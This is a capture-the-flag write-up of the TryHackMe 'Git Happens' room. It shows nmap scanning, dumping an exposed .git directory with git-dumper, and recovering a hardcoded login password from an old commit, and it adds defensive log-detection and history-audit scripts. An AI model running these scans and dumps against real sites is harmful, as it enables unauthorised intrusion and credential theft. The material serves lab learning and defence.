THM: Git Happens

Nmap
First we scan for open ports.
# nmap -p- -T4 -sV -sC 10.10.34.27 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-12 19:25 BST
Nmap scan report for 10.10.34.27
Host is up (0.020s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
| http-git:
| 10.10.34.27:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.78 seconds
Website
The website is a login form.
The nmap scan found a .git subdirectory, and we can confirm in the browser that it exists. Using git-dumper we pull down the contents.
# python3 -m git_dumper http://10.10.34.27/.git/ repo
Warning: Destination '.' is not empty
[-] Testing http://10.10.34.27/.git/HEAD [200]
[-] Testing http://10.10.34.27/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.34.27/.git/ [200]
[-] Fetching http://10.10.34.27/.gitignore [404]
[-] http://10.10.34.27/.gitignore responded with status code 404
[-] Fetching http://10.10.34.27/.git/index [200]
[-] Fetching http://10.10.34.27/.git/branches/ [200]
[-] Fetching http://10.10.34.27/.git/info/ [200]
[-] Fetching http://10.10.34.27/.git/logs/ [200]
[-] Fetching http://10.10.34.27/.git/objects/ [200]
[-] Fetching http://10.10.34.27/.git/HEAD [200]
[-] Fetching http://10.10.34.27/.git/packed-refs [200]
[-] Fetching http://10.10.34.27/.git/description [200]
[-] Fetching http://10.10.34.27/.git/hooks/ [200]
[-] Fetching http://10.10.34.27/.git/refs/ [200]
[-] Fetching http://10.10.34.27/.git/config [200]
[-] Fetching http://10.10.34.27/.git/logs/HEAD [200]
[-] Fetching http://10.10.34.27/.git/logs/refs/ [200]
[-] Fetching http://10.10.34.27/.git/info/exclude [200]
[-] Fetching http://10.10.34.27/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://10.10.34.27/.git/refs/heads/ [200]
[-] Fetching http://10.10.34.27/.git/refs/tags/ [200]
[-] Fetching http://10.10.34.27/.git/hooks/commit-msg.sample [200]
[-] Fetching http://10.10.34.27/.git/refs/remotes/ [200]
...
...
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 7 paths from the index
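Seen from the server, the crawl above is a burst of requests under /.git/ answered with 200. The following is an added example, not part of the original write-up, that flags such clients in nginx "combined" access log lines; the sample log lines and the function names are constructed for illustration.

```sh
#!/bin/sh
# Report clients that were served content from under /.git/.
# stdin:  access log lines in nginx "combined" format
# stdout: "<client> <hits>" for each client with at least $1 hits (default 1)
git_exposure_hits() {
    awk -F'"' -v min="${1:-1}" '
        NF >= 3 {
            # Splitting on double quotes: $1 = client/ident/user/time,
            # $2 = request line, $3 = " status bytes ".
            split($1, pre, " ");  client = pre[1]
            split($2, req, " ");  path = req[2]
            split($3, post, " "); status = post[1]
            in_git = (path == "/.git" || index(path, "/.git/") == 1)
            # Only 2xx matters: a 403 or 404 means nothing was handed out.
            if (in_git && substr(status, 1, 1) == "2") hits[client]++
        }
        END { for (c in hits) if (hits[c] >= min) print c, hits[c] }
    ' | sort
}

# Constructed sample lines (documentation address ranges, not from the room).
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [12/Aug/2025:19:30:01 +0100] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.32"
192.0.2.10 - - [12/Aug/2025:19:30:01 +0100] "GET /.git/ HTTP/1.1" 200 1210 "-" "python-requests/2.32"
192.0.2.10 - - [12/Aug/2025:19:30:02 +0100] "GET /.gitignore HTTP/1.1" 404 178 "-" "python-requests/2.32"
192.0.2.10 - - [12/Aug/2025:19:30:02 +0100] "GET /.git/index HTTP/1.1" 200 1038 "-" "python-requests/2.32"
192.0.2.10 - - [12/Aug/2025:19:30:02 +0100] "GET /.git/config HTTP/1.1" 200 110 "-" "python-requests/2.32"
198.51.100.7 - - [12/Aug/2025:19:31:10 +0100] "GET / HTTP/1.1" 200 6890 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Aug/2025:19:31:10 +0100] "GET /css/style.css HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Aug/2025:19:32:40 +0100] "GET /.git/HEAD HTTP/1.1" 403 162 "-" "curl/8.5.0"
EOF
}

sample_log | git_exposure_hits
```

Any client reported here received repository data, so the finding calls for blocking the path and rotating whatever the history contains.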
Changing directory into the repo folder we dumped the site contents to, we run git status; given the normal response, it appears we have a working repo.
# git status
On branch master
nothing to commit, working tree clean
To check what has happened in the repo we run git log.
# git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

    Update .gitlab-ci.yml

commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:21:25 2020 +0200

    add gitlab-ci config to build docker file.

commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:08:38 2020 +0200

    setup dockerfile and setup defaults.

commit d6df4000639981d032f628af2b4d03b8eff31213
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:42:30 2020 +0200

    Make sure the css is standard-ish!

commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:41:12 2020 +0200

    re-obfuscating the code to be really secure!

commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:37:32 2020 +0200

    Security says obfuscation isn't enough.
    They want me to use something called 'SHA-512'

commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:25:52 2020 +0200

    Obfuscated the source code.
    Hopefully security will be happy!

commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

    Initial commit
We notice there is an entry about obfuscating some code to make security happy, and that the entry before it created the login page. We want to see the code as it was before that change, so we check out the relevant commit.
# git checkout 395e087334d613d5e423cdf8f7be27196a360459
Note: switching to '395e087334d613d5e423cdf8f7be27196a360459'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 395e087 Made the login page, boss!
Looking inside index.html for this version of the code we see some credentials. The password is the flag needed for the room.
# cat index.html
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Super Awesome Site!</title>
    <link rel="stylesheet" href="/css/style.css">
  </head>
  <body>
    ...
    ...
    <script>
      function login() {
        let form = document.getElementById("login-form");
        console.log(form.elements);
        let username = form.elements["username"].value;
        let password = form.elements["password"].value;
        if (
          username === "admin" &&
          password === "***********************************"
        ) {
          document.cookie = "login=1";
          window.location.href = "/dashboard.html";
        } else {
          document.getElementById("error").innerHTML =
            "INVALID USERNAME OR PASSWORD!";
        }
      }
    </script>
  </body>
</html>
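Later commits changed the login code, but the original version stays reachable in history, so a review of the checked-out tree alone would miss it. The following is an added example, not part of the original write-up, of an audit that searches every commit for a credential pattern; the demo repository, its file contents, the function names and the pattern are all constructed for illustration.

```sh
#!/bin/sh
# Search every commit of a repository for a credential pattern, not just HEAD.

# "<short-commit> <path>" for each file version, in any commit reachable from
# any ref of repo $1, that has a line matching extended regex $2.
history_secret_hits() {
    git -C "$1" rev-list --all | while read -r commit; do
        # On a commit, git grep -l prints "<commit>:<path>"; no match exits 1.
        git -C "$1" grep -lE -e "$2" "$commit" -- || true
    done | awk -F: '{ print substr($1, 1, 7), $2 }'
}

# The same search limited to the tip commit, for comparison.
head_secret_hits() {
    git -C "$1" grep -lE -e "$2" HEAD -- | awk -F: '{ print $2 }'
}

demo_commit() {  # $1 = repo, $2 = commit message
    git -C "$1" add -A &&
    git -C "$1" -c user.name=demo -c user.email=demo@example.invalid \
        -c commit.gpgsign=false commit -q -m "$2"
}

# Constructed two-commit repo: a literal password is committed, then replaced.
make_demo_repo() {
    dir=$(mktemp -d) || return 1
    git -C "$dir" init -q || return 1
    echo 'if (password === "CONSTRUCTED-DEMO-SECRET") {' > "$dir/index.html"
    demo_commit "$dir" "login page with literal password" || return 1
    echo 'if (sha512(password) === STORED_HASH) {' > "$dir/index.html"
    demo_commit "$dir" "compare a hash instead" || return 1
    echo "$dir"
}

# Illustrative pattern: the word "password", an =/: operator, a quoted literal.
PATTERN='password *[=:]+ *"[^"]+"'

repo=$(make_demo_repo) && {
    echo "files matching at HEAD:   $(head_secret_hits "$repo" "$PATTERN" | wc -l)"
    echo "file versions in history: $(history_secret_hits "$repo" "$PATTERN" | wc -l)"
    history_secret_hits "$repo" "$PATTERN"
    rm -rf "$repo"
}
```

A hit in history means the credential has to be rotated; committing a fix on top does not remove the earlier version from the repository.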